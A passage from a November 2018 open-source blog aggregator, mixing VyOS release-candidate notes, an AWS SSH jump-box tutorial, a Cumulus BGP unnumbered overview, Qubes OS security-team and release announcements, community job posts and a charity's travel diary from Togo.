The first bug was that the system allowed you to remove a bridge that still had active members (T898). Even with that bug fixed, you still could not remove a tunnel interface from a bridge because its own script was faulty (T900).

Both are now fixed, but there are still issues in that script: STP cost and priority options are not functional. We may fix it in the next release candidate.

Additionally, OpenVPN interfaces could not be added to bridges due to a brctl syntax change, as reported by afics in T884. This should also be fixed now.

Image signature check failure confirmation

Armin Fisslthaler (afics) noticed a particularly embarrassing bug: when the installer fails to verify the image GPG signature (due to a missing key or otherwise), it asks if you want to proceed, and suggests that the default option is "No", but if you just hit Enter, it proceeds instead of exiting (T885).
Ewald van Geffen took the time to fix that conditional and now it should no longer haunt us.

Missing release key in the image

Speaking of which, the VyOS release key is now included in the image and signature check should no longer fail.

More fixes

Corrected the syntax for deleting IPv6 next-hop (T800, fix suggested by Merjin).

IPv6 next-hop local value is now validated at set rather than commit time (T897).

Known issues

07 November, 2018 07:00AM by Daniil Baturin

VyOS 1.2.0-rc4 is available for download

VyOS 1.2.0-rc4 release candidate is available for download from here

The release includes multiple bug fixes and a few small features.

You can view the complete changelog here.

Here are some highlights:

Bugfix: SNMP and routing protocols

Due to a change in FRR compared to our old Quagga, SNMP support for routing protocols had been broken for a while. Now it should work again.

Bugfix: BGP community lists

Due to another change in FRR, we've had an annoying bug that made it impossible to edit BGP community list rules after creation (T799).

For now it was fixed using a dirty hack that may slow down community list editing operations somewhat, and the root cause was reported to FRR maintainers. Once they fix it, we can remove the hack easily.

Feature: BGP extended community lists

Support for extended community lists was supposed to be there for a long time, but in reality the commands were broken (T64).
The bug in community lists editing helped us discover that issue, and the commands were fixed.

Here is an example of that feature's syntax:

# show policy extcommunity-list ExctcommunityExample
 rule 10 {
     action permit
     regex 100000:999
 }
 rule 30 {
     action deny
     regex ^$
 }
# show policy route-map ExtcommunityExample
 rule 10 {
     action permit
     match {
         extcommunity ExctcommunityExample
     }
 }
Please test it and tell us if it works fine for you.

SSH allow-root option

The "service ssh allow-root" option is no longer supported. It will be automatically removed from configs the first time the upgraded image boots.

It's common wisdom that logging in as root is not a good idea. We believe this change is going to have a very limited impact. One objection was that automation tools may need it, but all modern tools such as Ansible are capable of elevating privileges properly with sudo.

However, if your automation setup is using it, please take it into account. You still have time to do it before 1.2.0 LTS is released.

New drivers and utilities

VyOS now includes updated firmware packages, in particular, new firmware for Broadcom cards that were reported not to work in T708.

The image also includes a few popular diagnostic tools by default, such as htop, atop, and iotop.

07 November, 2018 07:00AM by Daniil Baturin

VyOS 1.2.0-rc5 is available for download

As tradition dictates, the new weekly release candidate is available for download

Package updates

The following packages have been updated:

  1. Linux kernel to 4.14.75
  2. Mellanox network drivers to 4.4

Bug fixes

SNMP integration with routing protocols

The last bit of configuration required for it to work is now in, and it should work as expected again. If it doesn't work for you, let us know!

VRRP not working in unicast mode when the RFC-compatible mode is selected

In T933 it was reported that if you configure VRRP in unicast mode and choose to use virtual MACs (RFC compatible mode), both nodes become masters. Now the config option required for this to work is inserted into keepalived config.

DHCP relay now handles the port option correctly

As reported in T938, DHCP relay would not handle the port option correctly. Now it does.

Tag nodes with whitespace

As reported in T253, it was possible to create a tag node with whitespace in its name (e.g. "set system login user "foo bar" authentication..."), but such configs would not be parsed correctly if you try to load them back.

In most cases attempts to create such nodes should be blocked at the syntax validation level, but since old configs with such nodes may exist, and it is impossible to disallow doing that completely at the set command level, we've added support for quoting such nodes properly in the code responsible for displaying and saving configs. Now such configs will load at least partially and produce more descriptive errors when disallowed by individual command syntax.
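As an illustration of the quoting rule described above (not VyOS's actual implementation), a config renderer only needs to wrap node names containing whitespace in double quotes so that saved configs parse back correctly:

```python
import re

def format_node_name(name: str) -> str:
    """Quote a config node name if it contains whitespace.

    Illustrative sketch of the behaviour described above, not the
    actual VyOS rendering code.
    """
    return '"{}"'.format(name) if re.search(r"\s", name) else name

# A tag node created as: set system login user "foo bar" authentication ...
print(format_node_name("foo bar"))  # quoted on output
print(format_node_name("foobar"))   # left as-is
```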

Commit archive problem with edit levels

As reported in T570, changing the edit level caused the commit archive feature to save only the config at that level to the remote server, for example, if you did "edit interfaces", the archived config would contain nothing but the interfaces subtree.
It was caused by erroneous omission of the option that makes cli-shell-api output the entire config regardless of the edit level and should be fixed now.

The "run monitor traffic interface ... filter" commands now have full support for tcpdump filters

As reported in T931, commands like "run monitor traffic interface eth0 filter 'src ... or dst ...'" would fail. Now the simple mistake that caused it is fixed and such commands should work again.

Compatibility notes

Username restrictions

Related to the whitespace issue, some commands had overly permissive syntax. The "system login user" username format is now restricted to the POSIX portable character set (alphanumeric characters, underscores, hyphens, and dots) and to a length below 100 characters. If a username does not conform to the unquestionably portable format (alphanumeric characters, underscores, and hyphens only), you will receive a warning.

There may be old configs with unusual usernames, and they may now fail to load. If you run into issues with these restrictions, let us know.
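A rough sketch of the new restriction in Python. The exact character set and the leading-character rule that VyOS enforces may differ; the regex below is an assumption for illustration, not the actual validation code:

```python
import re

# POSIX portable characters (alphanumerics, '.', '_', '-'), no leading
# hyphen, total length below 100 characters.
PORTABLE_USERNAME = re.compile(r"[A-Za-z0-9._][A-Za-z0-9._-]{0,98}")

def is_portable_username(name: str) -> bool:
    """Return True if the name fits the portable username format sketched above."""
    return PORTABLE_USERNAME.fullmatch(name) is not None

print(is_portable_username("vyos"))     # True
print(is_portable_username("foo bar"))  # False: contains whitespace
print(is_portable_username("-oops"))    # False: leading hyphen
```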

The "inspect" action in firewall rules no longer exists

The "inspect" action was once used for the IPS/IDS functionality, but the IDS (it was Snort) was removed long before VyOS was forked from Vyatta. The now useless action, however, persisted.

Now we have removed it. We think the chance to see it in a real config is very low, and this should have no impact, but if you run into problems, leave a note in T59, and we'll make a migration script.

In other news

The 1.2.0/Crux repositories are now fully separated from the "current" branch repositories, in preparation for the LTS release. This reopens the "current" branch for experimental and potentially unsafe changes so that we can start working on new big rewrites, migration to newer Debian and other things required for the future 1.3.0 release.

07 November, 2018 07:00AM by Daniil Baturin

hackergotchi for Ubuntu developers

Ubuntu developers

Diego Turcios: Access to AWS Postgres instance in private subnet

I have been working with AWS in the last few days and encountered some issues when using RDS. Generally, when you're working in a development environment, you set up your database as publicly accessible, and this isn't an issue. But when you're working in production, you should place the Amazon RDS database into a private subnet. So what do we need to do to connect to the database using PgAdmin or another tool?

We're going to use one of the most common methods for doing this. You will need to launch an Amazon EC2 instance in the public subnet and then use it as a jump box.

So after you have your EC2 instance, you will need to run the following command. See the explanation below.
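The command in question is a local SSH port forward through the EC2 jump box. A sketch, in which the key file, the EC2 public hostname, and the RDS endpoint are all placeholder names, not real ones:

```
# Forward local port 5433 through the EC2 jump box to the RDS instance.
# key.pem, ec2-user@jump-box-public-dns, and the RDS endpoint are placeholders.
ssh -i key.pem -N -L 5433:my-db.example-id.us-east-1.rds.amazonaws.com:5432 \
    ec2-user@jump-box-public-dns
```

PgAdmin then connects to localhost on the local port (5433 here), and the jump box relays the traffic to the database inside the private subnet.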

After this, you will need to configure your PgAdmin.
The host name will be localhost, and the port is the same one you defined in the above command.
Maintenance database will be your DB name, and the username is the one you use for connecting.

Hope this helps you connect to your databases.

07 November, 2018 02:54AM by Diego Turcios

November 06, 2018

Cumulus Linux

BGP Unnumbered Overview

The Border Gateway Protocol (BGP) is an IP reachability protocol that you can use to exchange IP prefixes. Traditionally, one of the nuisances of configuring BGP is that if you want to exchange IPv4 prefixes you have to configure an IPv4 address for each BGP peer. In a large network, this can consume a lot of your address space, requiring a separate IP address for each peer-facing interface.

BGP Over IPv4 Interfaces

To understand where BGP unnumbered fits in, it helps to understand how BGP has historically worked over IPv4. Peers connect via IPv4 over TCP port 179. Once they’ve established a session, they exchange prefixes. When a BGP peer advertises an IPv4 prefix, it must include an IPv4 next hop address, which is usually the address of the advertising router. This requires, of course, that each BGP peer has an IPv4 address.

As a simple example, using the Cumulus Reference Topology, let’s configure BGP peerings as follows:

Between spine01 (AS 65020) and leaf01 (AS 65011)

Between spine01 and leaf02 (AS 65012)

Leaf01 will advertise its prefix and leaf02 will advertise its own. Let's set it up:
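The configuration listing itself was lost from this copy of the post. As a rough sketch, a traditional numbered peering on spine01 in FRR/vtysh syntax could look like this (the peer addresses are invented placeholders, not the ones from the Cumulus Reference Topology):

```
router bgp 65020
 ! Placeholder peer addresses -- each numbered peering consumes
 ! an IPv4 address on both ends of the link.
 neighbor remote-as 65011   ! leaf01, reachable via swp1
 neighbor remote-as 65012   ! leaf02, reachable via swp2
```

The key point is that every peer-facing interface needs its own IPv4 address before either of these sessions can come up.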

Now let's take a look at the BGP RIB to see if spine01 has learned the two prefixes:

It has! And notice that the Next Hop address for each is the interface IPv4 address of the respective neighbor. The requirement that each prefix has a Next Hop address is the reason we historically had to configure IPv4 addresses on all of our BGP-speaking interfaces.

Enabling BGP Unnumbered

The BGP unnumbered standard, laid out in RFC 5549, no longer requires an IPv4 prefix to be advertised along with an IPv4 next hop. That means you can set up BGP peering among your Cumulus Linux switches and exchange IPv4 prefixes without having to configure an IPv4 address on each switch. In other words, the interfaces used by BGP are unnumbered, at least when it comes to IPv4. So next, let’s remove those interface IPv4 addresses and set up BGP unnumbered.

The BGP session with leaf01 and leaf02 will immediately drop and spine01 will remove the two prefixes it learned. Let’s verify this:

Next, we’ll reconfigure BGP to use the IPv6 link-local addresses of leaf01 and leaf02, instead of their IPv4 addresses.

There’s a new command we need to issue for each interface: the capability extended-nexthop command is what actually enables BGP Unnumbered:

We’ll do the same thing on leaf01:

And leaf02:

Now let’s jump back to spine01 and see if we have a BGP session established with leaf01 and leaf02.

Notice that the Next Hop for each prefix is no longer an address, but an interface – swp1 and swp2. Let’s take a closer look at the RIB to see what these interfaces resolve to.

The next hop address for each prefix is an IPv6 link-local address, which is assigned automatically to each interface. By using the IPv6 link-local address as a next hop instead of an IPv4 unicast address, BGP Unnumbered saves you from having to configure IPv4 addresses on each interface!

Finally, the ultimate test is whether leaf01 and leaf02 have IP reachability to each other. Let’s run a traceroute from leaf01 to leaf02.

The packets move from leaf01 through spine01 and finally to leaf02. Even though spine01 has no interface IPv4 addresses configured, and even though each BGP session is running over IPv6, they’re all still able to exchange IPv4 routes and pass IPv4 traffic.

And that’s BGP Unnumbered.

Looking for more technical resources? Read all of our latest blogs here. 

The post BGP Unnumbered Overview appeared first on Cumulus Networks engineering blog.

06 November, 2018 08:10PM by Ben Piper


Ubuntu developers

Jono Bacon: Video: 10 Avoidable Career Mistakes (and How to Conquer Them)

I don’t claim to be a career expert, but I have noticed some important career mistakes many people make (some I’ve made myself!). These mistakes span how we approach our career growth, balance our careers with the rest of our lives, and make the choices we do on a day-to-day basis.

In the latest episode of my Open Organization video series, I delve into 10 of the most important career mistakes people tend to make. Check it out below:

So, now let me turn it to you. What are other career mistakes that are avoidable? What have you learned in your career? Share them in the comments below!

The post Video: 10 Avoidable Career Mistakes (and How to Conquer Them) appeared first on Jono Bacon.

06 November, 2018 04:30PM

Qubes


XSA-282 does not affect the security of Qubes OS

Dear Qubes Community,

The Xen Project has published Xen Security Advisory 282 (XSA-282). This XSA does not affect the security of Qubes OS, and no user action is necessary.

This XSA has been added to the XSA Tracker:

06 November, 2018 12:00AM

November 05, 2018


Ubuntu developers

The Fridge: Ubuntu Weekly Newsletter Issue 552

Welcome to the Ubuntu Weekly Newsletter, Issue 552 for the week of October 28 – November 3, 2018. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

05 November, 2018 10:56PM

ARMBIAN


Bananapi R2

Hold the power button for about 7-8 seconds to power the device up. Boot log: Known problems: HDMI is not working and probably never will; the onboard wireless is too fragile and is disabled by default.

05 November, 2018 10:34AM by chwe


Ubuntu developers

Jono Bacon: My Clients Are Hiring Community Roles: Corelight, Scality, and Solace

One of the things I love about working with such a diverse range of clients is helping them to shape, source, and mentor high-quality staff to build and grow their communities.

Well, three of my clients, Corelight, Scality, and Solace, are all hiring community staff for their teams. I know many of you work in community management, so I always want to share new positions here in case you want to apply. If these look interesting, you should apply via the role description – don’t send me your resume. If we know each other (as in, we are friends/associates), feel free to reach out to me if you have questions.

(These are listed alphabetically based on the company name)

Corelight Director of Community

See the role here

Corelight are doing some really interesting work. They provide security solutions based around the Bro security monitor, and they invest heavily in that community (hiring staff, sponsoring events, producing code and more). Corelight are very focused on open source and being good participants in the Bro community. This role will not just serve Corelight but also support and grow the Bro community.

Scality Technical Community Manager

See the role here

I started working with Scality a while back with the focus of growing their open source Zenko community. As I started shaping the community strategy with them, we hired for the Director of Community role there, and my friend Stefano Maffulli, who had done great work at DreamHost and OpenStack, got it.

Well, Stef needs to hire someone for his team, and this is a role with a huge amount of potential. It will be focused on building, fostering, and growing the Zenko community, producing technical materials, working with developers, speaking, and more. Stef is a great guy and will be a great manager to work for.

Solace Director Of Community and Developer Community Evangelist

Solace have built a lightning-fast infrastructure messaging platform and they are building a community focused on supporting developers who use their platform. They are a great team, and are really passionate about not just building a community, but doing it the right way.

They are hiring for two roles. One will be leading the overall community strategy and delivery and the other will be an evangelist role focused on building awareness and developer engagement.

All three of these companies are doing great work, and really focused on building community the right way. Check out the roles and best of luck!

The post My Clients Are Hiring Community Roles: Corelight, Scality, and Solace appeared first on Jono Bacon.

05 November, 2018 06:29AM

Qubes


Qubes Security Team Update

As we recently announced, Joanna Rutkowska has turned over leadership of the Qubes OS Project to Marek Marczykowski-Górecki (see Joanna’s announcement and Marek’s announcement). In this post, we’ll discuss the implications of these changes for the Qubes Security Team and how we’re addressing them.

What is the Qubes Security Team?

The Qubes Security Team (QST) is the subset of the Qubes Team that is responsible for ensuring the security of Qubes OS and the Qubes OS Project. In particular, the QST is responsible for:

Because Qubes is a security-oriented operating system, the QST is fundamentally important to it, and every Qubes user implicitly trusts the members of the QST by virtue of the actions listed above.

How does the recent change in leadership affect the QST?

Until now, the two members of the QST have been Joanna and Marek. With Joanna’s new role at the Golem Project, she will no longer have time to function as a QST member. Therefore, Joanna will officially transfer ownership of the Qubes Master Signing Key (QMSK) to Marek, and she will no longer sign QSBs.

However, due to the nature of PGP keys, there is no way to guarantee that Joanna will not retain a copy of the QMSK after transferring ownership to Marek. Since anyone in possession of the QMSK is a potential attack vector against the project, Joanna will continue to sign Qubes Canaries in perpetuity.

With Joanna’s departure from the QST, Marek would remain as its sole member. Given the critical importance of the QST to the project, however, we believe that a single member would be insufficient. Therefore, after careful consideration, we have selected a new member for the QST from among our experienced Qubes Team members: Simon Gaiser (aka HW42).

About Simon

Simon has been a member of the Qubes Team for over two years and has been a contributor to the project since 2014. He has worked on many different parts of the Qubes codebase, including core, Xen, kernel, and GUI components. Earlier this year, he joined Invisible Things Lab (ITL) and has been gaining experience with other security projects. His thorough knowledge of Qubes OS, ability to assess the severity of security vulnerabilities, and experience preparing Xen patches make him very well-suited to the QST. Most importantly, both Joanna and Marek trust him with the responsibilities of this important role. We are pleased to announce Simon’s new role as a QST member. Congratulations, Simon, and thank you for working to keep Qubes secure!

05 November, 2018 12:00AM

Qubes OS 4.0.1-rc1 has been released!

We’re pleased to announce the first release candidate for Qubes 4.0.1! This is the first of at least two planned point releases for version 4.0. Features:

  • All 4.0 dom0 updates to date
  • Fedora 29 TemplateVM
  • Debian 9 TemplateVM
  • Whonix 14 Gateway and Workstation TemplateVMs
  • Linux kernel 4.14

Qubes 4.0.1-rc1 is available on the Downloads page.

What is a point release?

A point release does not designate a separate, new version of Qubes OS. Rather, it designates its respective major or minor release (in this case, 4.0) inclusive of all updates up to a certain point. Installing Qubes 4.0 and fully updating it results in the same system as installing Qubes 4.0.1.

What should I do?

If you’re currently using an up-to-date Qubes 4.0 installation, then your system is already equivalent to a Qubes 4.0.1 installation. No action is needed.

Regardless of your current OS, if you wish to install (or reinstall) Qubes 4.0 for any reason, then the 4.0.1 ISO will make this more convenient and secure, since it bundles all Qubes 4.0 updates to date. It will be especially helpful for users whose hardware is too new to be compatible with the original Qubes 4.0 installer.

Release candidate planning

We expect that there will be a second release candidate (4.0.1-rc2) following this one (4.0.1-rc1). The second release candidate will include a fix for the Nautilus bug reported in #4460 along with any other available fixes for bugs reported against this release candidate. As usual, you can help by reporting any bugs you encounter.

What about Qubes 3.2.1?

We announced the release of 3.2.1-rc1 one month ago. Since no serious problems have been discovered in 3.2.1-rc1, we plan to build the final version of Qubes 3.2.1 at the end of this week.

05 November, 2018 12:00AM

November 04, 2018


Ubuntu developers

Stephen Michael Kellat: Writing Up Plan B

With the prominence of things like Liberapay and Patreon as well as, I have had to look at the tax implications of them all.  There is no single tax regime on this planet.  Developers and other freelancers who might make use of one of these services within the F/LOSS frame of reference are frequently not within the USA frame of reference.  That makes a difference.


I also have to state at the outset that this does not constitute legal advice.  I am not a lawyer.  I am most certainly not your lawyer.  If anything these recitals are my setting out my review of all this as being “Plan B” due to continuing high tensions surrounding being a federal civil servant in the United States.  With an election coming up Tuesday where one side treats it as a normal routine event while the other is regarding it as Ragnarok and is acting like humanity is about to face an imminent extinction event, changing things up in life may be worthwhile.


An instructive item to consider is Internal Revenue Service Publication 334 Tax Guide for Small Business (For Individuals Who Use Schedule C or C-EZ).  The current version can be found online at  Just because you receive money from people over the Internet does not necessarily mean it is free from taxation.  Generally the income a developer, freelance documentation writer, or a freelancer in general might receive from a Liberapay or appears to fall under “gross receipts”.  


A recent opinion of the United States Tax Court (Felton v. Commissioner, T.C. Memo 2018-168) discusses the issue of “gift” for tax purposes rather nicely in comparison to what Liberapay mentions in its FAQ.  You can find the FAQ at  The opinion can be found at  After reading the discussion in Felton, I remain assured that in the United States context anything received via Liberapay would have to be treated as gross receipts in the United States.  The rules are different in the European Union where Liberapay is based and that’s perfectly fine.  In the end I have to answer to the tax authorities in the United States.


The good part about reporting matters on Schedule C is that it preserves participation in Social Security and allows a variety of business expenses and deductions to be taken.  Regular wage-based employees pay into Social Security via the FICA tax.  Self-employed persons pay into Social Security via SECA tax.


Now, there are various works I would definitely ask for support if I left government.  Such includes:


  • Freelance documentation writing

  • Emergency Management/Homeland Security work under the aegis of my church

  • Podcast production

  • Printing & Publishing


For podcast production, general news reviews would be possible.  Going into actual entertainment programming would be nice.  There are ideas I’m still working out.


Printing & Publishing would involve getting small works into print on a more rapid cycle in light of an increasingly censored Internet.  As the case of shows, you can have one of your users do something horrible but not actually do anything as a site but still have all your hosting partners withdraw service so as to knock you offline.  Outside the context of the USA, total shutdowns of access to the Internet still occur from time to time in other countries.


Emergency Management comes under the helping works of the church.


As to documentation writing, I used to write documentation for Xubuntu.  I want to do that again.


As to the proliferation of codes of conduct that are appearing everywhere, I can only offer the following statement:


“I am generally required to obey the United States Constitution and laws of the United States of America, the Constitution of the State of Ohio and Ohio’s laws, and the orders of any commanding officers appointed to me as a member of the unorganized militia (Ohio Revised Code 5923.01(D), Title 10 United States Code Section 246(b)(2)).  Codes of Conduct adopted by projects and organizations that conflict with those legal responsibilities must either be disregarded or accommodations must otherwise be sought.”


So, that’s “Plan B”.  The dollar amounts remain flexible at the moment as I’m still waiting for matters to pan out at work.  If things turn sour at my job, I at least have plans to hit the ground running seeking contracts and otherwise staying afloat.



04 November, 2018 11:21PM

Tiago Carrondo: S01E08 – Chocos com tinta

This week we had Pedro Silva with us, who came to talk about the Linux Days that took place “in Czechia” and also about his experience as a graphic designer in a world dominated by Apple and Adobe; he shared with us how he manages to carry out his professional activity without either one. We also talked about System76, open-source routers from Passwordscon, and much more! You know the drill: listen, subscribe, and share!


This episode was produced and edited by Alexandre Carrapiço (Thunderclaws Studios – sound recording, production, editing, mixing, and mastering); contact: thunderclawstudiosPT–arroba–

Attribution and licenses

The cover image is by PacificKlaus on Visualhunt and is licensed CC BY-NC.

The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae and is licensed under the CC0 1.0 Universal License.

This episode is licensed under the Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) license, whose full text can be read here. We are open to licensing for other types of use; contact us for validation and authorization.

04 November, 2018 10:53PM


Emmabuntüs Debian Edition

YovoTogo Diary 2018 (Episode 6)

Wednesday November 1.

Today we journey to Lomé, from where Isabelle, Françoise, Clémence, and Jean Marie will fly back to France on Friday evening. Claude and Marie-Paule will stay here for another month to finalize various projects outside the Don Orione Center. This includes taking delivery of the material currently waiting in the Lomé harbor and distributing it, in order to set up several computer rooms, plus a sewing workshop and a documentation workshop within the Dapaong FabLab with our JUMP Lab’Orione partners, etc.

We leave Bombouaka at 6:30 AM on a bus of the E.tra.B company, which offers only basic comfort, and it takes us more than 10 hours to cross the whole country, happy spectators of Togo’s diverse landscapes.

Our friend Kossivi is waiting for us at the bus station with two cabs to drive us to our lodging in the Tokoin-Witti area.

Thursday November 2.

A relaxing day at Agbodrafo, a village wedged between the road and Lake Togo. In the morning we boarded a dugout canoe for a round trip to Togoville, sailing through the fishermen’s nets and crossing paths with the gasoline traffickers coming from Nigeria. We sailed alongside the “sacred forest,” which is off-limits to strangers; this wood is an area reserved for the animists. We had lunch almost with our feet in the water, in the shade of palm trees, in the company of our guides and friends Elias and Kossivi.

In the afternoon we visited “The Slaves’ House – the Well of the Chained.” Agbodrafo, also called Porto Seguro, was at the heart of the slave trade that raged all along the Benin bay from the 17th to the 19th century.

In the evening we went to the Lomé beach to have dinner to the beat of African music.

Friday November 3.

A walk through the Lomé market in the morning, then lunch at noon with Father Alain KINI, manager of the Don Orione Center, who is stopping over in Lomé on his way back from a seminar in Ivory Coast. Together we share our impressions of the journey and our findings, and at his own request we make some suggestions to potentially improve the Center’s organization. One last cold drink on the beach in the afternoon, and this is the end of the journey for Isabelle, Françoise, Clémence, and Jean Marie. Well, that is what they thought, until they reached the airport and learned that their flight had been canceled due to technical issues. They were then transferred to one of the best hotels in Lomé, with all costs covered, as usual, by the airline. They will take off tomorrow, Saturday, in the evening.

Bye-bye Togo

That same Saturday, Marie-Paule and Claude go back north in the car of Father Alain KINI, who will drop them off in Sokodé at the home of their friends Yobé and Madeleine, where they will spend several days before returning to Dapaong. From there they have to organize the transfer and reception of 7 m³ (about 250 cubic feet) of shipped equipment: computers, copy machines, leather, various collected donations, etc. Three official openings of training rooms, each equipped with 20 computers, are planned, as well as the start-up of the sewing and embroidery workshop together with the documentation workshop. Marie-Paule and Claude will report on their next actions on the News page of the YovoTogo site.

All the participants experienced a great deal of sharing during this solidarity journey; the Togolese people are very friendly, hospitable, open-minded, and spontaneous.

Some food purchases on our way back to Bombouaka

Life itself is a journey, and as Johann Wolfgang von Goethe wrote:

“Do you want to be happy? Travel with two bags,
one to give, the other to receive”

Extracts from: Voyage de solidarité 2018 de nos amis de YovoTogo

Image source: YovoTogo

04 November, 2018 07:41PM by Patrick Emmabuntüs

2018 Solidarity Journey of Our Friends from YovoTogo (Episode 6)

Wednesday, November 1

Today we travel to Lomé, from where Isabelle, Françoise, Clémence, and Jean Marie will take off Friday evening to return to France. Claude and Marie-Paule will stay another month to finalize the projects outside the Don Orione Center and to receive and transport the material currently in the port of Lomé, with a view to setting up several computer rooms, a sewing workshop, and a documentation workshop at the Dapaong FabLab with our JUMP Lab’Orione partners, etc.

We leave Bombouaka at 6:30 AM on a bus of the E.tra.B company with very basic comfort; it takes us a little over 10 hours to cross the whole country, happy spectators of the varied landscapes that Togo has to offer.

Our friend Kossivi is waiting for us at the arrival station with two taxis to drive us to our lodging in the Tokoin-Witti district.

Thursday, November 2

A day of relaxation at Agbodrafo, a village wedged between the road and Lake Togo. In the morning we boarded a dugout canoe for a round trip to Togoville through the fishermen’s nets, crossing paths with the comings and goings of the gasoline traffickers from Nigeria. We sailed along the “sacred forest,” which is off-limits to strangers; this wood is the reserved domain of the animists. We had lunch almost with our feet in the water, in the shade of the palm trees, in the company of Elias and Kossivi, our friends and guides.

In the afternoon, a visit to “The Slaves’ House – Wood Home – the Well of the Chained.” Agbodrafo, or Porto Seguro, was at the heart of the slave trade that raged all along the Gulf of Benin from the 17th to the 19th century.

In the evening we went to the Lomé beach to eat to the rhythm of African music.

Friday, November 3

A stroll through the Lomé market in the morning; at noon, a meal shared with Father Alain KINI, head of the Don Orione Center, who is passing through Lomé on his way back from a seminar in Ivory Coast. We talk together about our stay, share our impressions with him, and report our observations, proposing at his request a few avenues for future improvement. One last cold drink on the beach in the afternoon, and the stay is over for Isabelle, Françoise, Clémence, and Jean Marie. At least, that is what they believed until they reached the airport, where they learned that their flight had been canceled for technical reasons. They were then transferred to one of the finest hotels in Lomé, all expenses paid by the airline, as is proper in such cases. They would in fact leave the next day, Saturday, in the late afternoon.

Goodbye, Togo

That same Saturday, Marie-Paule and Claude head back north by car with Father Alain KINI and are dropped off in Sokodé at the home of their friends Yobé and Madeleine, where they will spend several days before returning to Dapaong, from where they will have to organize the transport and take delivery of the 7 m³ of shipped material: computer equipment, leather, collected donations, photocopiers, etc. Three inaugurations of computer rooms with 20 computers each are planned, as well as the start-up of a sewing and embroidery workshop and a documentation workshop. They will report on these upcoming actions on the News page of the site.

All the participating members found a great deal of sharing in this solidarity trip; the Togolese are very welcoming, hospitable, open, and spontaneous.

A few food purchases on the road back to Bombouaka

Life itself is a journey, and as Johann Wolfgang von Goethe said:
“Do you want to live happily? Travel with two bags,
one to give, the other to receive”


Extract from the Voyage de solidarité 2018 de nos amis de YovoTogo

Image source: YovoTogo

04 November, 2018 06:49PM by Patrick Emmabuntüs

YovoTogo Diary 2018 (Episode 5)

Saturday October 27.

We spend the day in Dapaong.

We pick up Émilie and Marie-Jo (both sponsored through our association) at the Mô-Fant boarding high school of Dapaong, mainly for a walk to the town market. Like every year, we use this opportunity to buy them a few things to improve their daily lives. This time, we give them some cash that we let them manage on their own, and so they lead us from one shop to another, browsing the street stalls, where they buy cleansing and care products, bags of vegetables, some gari (a kind of cassava porridge), buckets, and other utensils …

Jean-Marie and Claude dare to taste the fried caterpillars in front of amused street vendors. Well, you really need to appreciate the nutritious virtues they are supposed to bring, because according to our friends, taste-wise there is still a long way to go …

Then we walk to the snack-bar, where we meet Afo, the JUMP Lab’Orione FabLab manager, and his 3-year-old son. Émilie’s mother and uncle then join us for a group photo. There are a lot of customers on this market day, and the service is rather slow. We use the long wait to talk further with the young girls, and after lunch we bring them back to the high school.

Next, we head to the “Yendube Children’s Hospital,” staffed by the Sisters of the Hotel-Dieu. The Director Sister receives us and agrees to guide us through the institution she manages, where many children are hospitalized.

Back in Bombouaka, we spend the evening with the teenagers of the Father Sebastien lounge, who had prepared a meal with the food we brought them according to their own shopping list. A warm and friendly evening together, extended by the traditional “dust ball,” with Isaac as DJ for the event.

Sunday October 28.

This morning is devoted to sport with the disabled young people of the Father Sebastien lounge of the Saint Louis Orione Center of Bombouaka: the association hands over a table-tennis table, together with equipment such as rackets, balls, nets, and score panels, as well as sports clothes collected and donated by a couple of associations in La-Roche-Sur-Yon, a city in Vendée.

The afternoon is dedicated to the Women Leaders of Tandjouaré (AFL-Tan). These women pool their energy to raise funds to finance local micro-credit. Together they make Néré mustard and liquid soap. Their main revenue is the contribution of 2,000 FCFA (3.05 €) per month and the interest on the loans. These three-month loans are renewable as soon as they are repaid and are mainly used for health care, children’s schooling, and starting up a new activity to generate some profit. Marie-Paule has been a member of this group for several years and was recently joined by Françoise, Clémence, and Isabelle.

A presentation concerning feminine hygiene and honey patches received a great deal of attention. It was also an opportunity to dance and share local Togolese dishes, accompanied by some Tchapalo (a kind of sorghum beer).

Monday October 29.

We meet very early with Georges MOUTORE, secretary-general of the OCDI (Charity Organization for Integral Development) Caritas Togo of Dapaong, and as we have for several years now, we hand over to him the collection of 2,000 eyeglasses, which will then be calibrated, indexed, and refurbished for the most disadvantaged people by César BOUKONTI, the technician of the “Light Road” optical workshop in the Dapaong hospital.

Today we make our last visits to families whose disabled children are followed by the Center. We go to Christine’s and Merveille’s homes.

Christine first consulted at the Center in May 2016. That visit revealed that she suffers from tetraplegia and lateral decubitus. This girl is very smart, and despite her disability she attends the local school in her village. She cannot sit up by herself, but the Center gave her a chair more or less adapted to her handicap, which enables her to attend school. She is also a very nice girl, but she needs lifelong assistance, because she cannot carry out the activities of daily living on her own. However, she speaks correctly and stubbornly refuses to go back to the Center, preferring to live with her family. It is a very complex situation to manage, both for the family and for the Center following her.

Merveille suffers from a bilateral equinus foot deformity, a congenital handicap. She first received successive cast corrections, and then she was operated on during a mission of orthopedic and plastic surgeons organized in 2008 by the “Saint Louis Orione” Center. In October 2012 she was hosted in the “Padre Pio Village” boarding school of the Center for better care of her education. Today she is 11 years old, walks almost normally, and attends school with no difficulty at all.

Tuesday October 30.

With the project completed, including assembly, welding, painting, and finishing touches, at 8 AM this morning the young guys of the welding workshop rush to bring their artworks to the intended location in the Don Orione Center. Earlier, they had loaded a cart with red sand, which is then spread out on the ground to install their works.

Unanimously, this set of art works is called “Back to the fields”. A villager on his bike, another standing up, and an imaginary little animal, form this original scene …

Finally, each in turn or all together, they pose for a picture next to their creations.

The feedback is very positive: the young welder and Maxime thank me with drawings and words, most of which convey happiness and pride at having learned how to make things and discovered new ones.

They expressed their wish: the design project must continue. And in return, I also learned a lot about their way of life and their daily work with their own means …

Jean Marie

In the meantime … After completing the various job descriptions, we held a well-received meeting with the nursing staff and the physiotherapists to propose a new work organization. This would allow continuous attendance at the Center, better monitoring of the hosted people, and optimization of individual support.

Then we exchanged ideas with Father Pierre about the Center’s operations (work organization, management, the children of the Cottolengo lounge, security issues, etc.) and explored ways to improve. This meeting revealed both the necessity and the desire to change current practices.


Together with Tchaou and Maurice, in the social service.


Extracts from: Voyage de solidarité 2018 de nos amis de YovoTogo

